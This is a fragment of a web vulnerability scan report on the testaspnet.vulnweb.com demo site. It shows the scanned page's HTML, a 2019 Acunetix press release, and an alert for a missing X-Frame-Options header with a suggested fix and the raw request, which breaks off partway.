          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+Ak/h9oIkGZGh4+qj2I+T7ihtiWg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        21. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (414 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgY